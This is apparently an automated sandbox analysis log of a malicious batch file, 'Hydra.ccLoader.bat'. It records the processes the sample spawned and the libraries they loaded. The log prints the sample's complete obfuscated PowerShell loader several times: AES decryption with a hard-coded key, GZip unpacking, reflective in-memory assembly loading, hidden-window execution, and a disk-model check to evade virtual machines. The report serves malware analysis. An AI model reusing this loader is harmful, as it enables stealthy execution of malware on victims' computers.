'$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
